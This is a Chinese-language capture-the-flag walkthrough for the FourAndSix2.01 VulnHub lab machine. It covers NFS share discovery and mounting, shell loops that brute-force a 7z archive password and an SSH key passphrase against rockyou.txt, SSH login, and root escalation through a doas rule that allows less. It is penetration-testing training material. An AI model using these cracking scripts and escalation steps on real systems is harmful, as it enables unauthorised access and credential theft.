VulnHub渗透测试之FourAndSix2.01 – 作者:MoR03r

VulnHub渗透测试之FourAndSix2.01

红日安全:MoR03r

红日博客:http://sec-redclub.com/team/

靶机

https://www.vulnhub.com/entry/fourandsix-201,266/

运行环境

​ VM Workstation

​ VM Esxi

​ VirtualBox

说明

获取root权限并且读取/root/flag.txt

设置

将下载好的ova文件直接导入虚拟机(这里我使用VM Esxi导入ova文件)

发现主机

打开Esxi虚拟机控制台网页,点击刚才安装好的虚拟机,可以看到当前虚拟机ip地址

Screenshot from 2018-12-12 11-02-07.png

我当前靶机ip为172.17.135.30

服务发现

使用Nmap对靶机进行扫描

Screenshot from 2018-12-12 11-24-21.png

Image

检测已知服务

开放2049端口,nmap探测显示为nfs服务,使用metasploit进行扫描可挂载目录

msf > use auxiliary/scanner/nfs/nfsmount

Screenshot from 2018-12-12 11-29-52.png

发现可挂载目录/home/user/storage

挂载目录:nfspysh -o server=172.17.135.30:/home/user/storage /tmp/storage

Screenshot from 2018-12-12 11-36-15.png

发现backup.7z这个压缩包,使用7z e backup.7z尝试解压,提示需要密码

Screenshot from 2018-12-12 11-38-33.png

查找资料发现可以用rarcrack对7z压缩包进行爆破

爆破命令:rarcrack --thread 4 --type 7z backup.7z

也可以使用7z命令进行字典爆破

7z-crack.sh

cat $2 | while read line;do if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;then echo "FOUND PASSWORD:"$line;break;fi;done

使用方法:

bash 7z-crack.sh /tmp/storage/backup.7z /usr/share/wordlists/rockyou.txt

这里我用7z命令进行爆破,稍作等待即可得到密码为chocolate

root@kali:/tmp/storage# bash 7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt 

FOUND PASSWORD:chocolate

解压backup.7z发现一堆图片,以及id_rsaid_rsa.pub

于是猜测可以通过公私钥登录服务器,将私钥放到/root/.ssh目录下,连接服务器

Screenshot from 2018-12-12 11-48-40.png

提示需要输入密码,写shell脚本破解私钥密码

id_rsa-crack.sh:

cat /usr/share/wordlists/rockyou.txt | while read line;do if ssh-keygen -p -P $line -N $line -f /tmp/test/id_rsa 1>/dev/null 2>/dev/null;then echo "PASSWORD FOUND : "$line;break;fi;done;

使用方法:

bash id_rsa-crack.sh /tmp/storage/id_rsa /usr/share/wordlists/rockyou.txt

Screenshot from 2018-12-12 11-53-59.png

爆破得到密码为12345678,连接服务器

ssh [email protected]

这里说明一下user用户,是从上面挂载nfs服务时的目录得到

查看当前用户权限及系统信息

fourandsix2$ id

uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)

fourandsix2$ uname -an

OpenBSD fourandsix2.localdomain 6.4 GENERIC#349 amd64

查看/etc目录,有doas.conf

fourandsix2$ cat /etc/doas.conf                                                                                 

permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog

permit nopass keepenv root as root

doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令

doas.conf文件可以看到,当前用户能够以root权限使用less命令查看/var/log/authlog文件,并且不需要当前用户密码以及root密码

那么我们可以通过less进行提权

首先用doas /usr/bin/less /var/log/authlog查看日志文件,然后直接按v,可进入编辑模式,但是会提示只读,进入编辑模式后,可以通过vi编辑器操作方式,执行系统命令,即:!/bin/sh,此时便会提升到root权限

Screenshot from 2018-12-12 12-07-58.png

读取/root/flag.txt内容

Screenshot from 2018-12-12 12-08-43.png

来源:freebuf.com 2019-01-11 08:56:31 by: MoR03r

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论